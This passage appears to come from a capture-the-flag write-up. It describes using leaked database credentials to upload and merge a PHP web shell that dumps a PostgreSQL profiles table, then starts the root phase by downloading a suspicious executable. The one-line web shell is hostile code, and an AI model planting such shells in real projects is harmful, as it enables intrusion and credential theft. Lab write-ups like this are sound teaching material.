So I decided to check the snippets and I found a code snippet that had the database credentials :

Now, all we need is to upload a shell to retrieve the credentials from the database.

First we add a new file and write our shell :

<?php $db_connection = pg_connect(“host=localhost dbname=profiles user=profiles password=profiles”); $result = pg_query($db_connection, “SELECT * FROM profiles”); $resultArr = pg_fetch_all($result); print_r($resultArr); ?>

And merge it :

All we need now is to curl to our shell to get the creds for the user .

The password looks like a base64 encoded after decoding it, It didn’t work so tried using it as it’s and it worked just fine.

We got the user flag .

PART TWO: ROOT

After enumerating, the only suspicious file RemoteConnection.exe .

So let’s check it

Starting by downloading the file from the machine using netcut.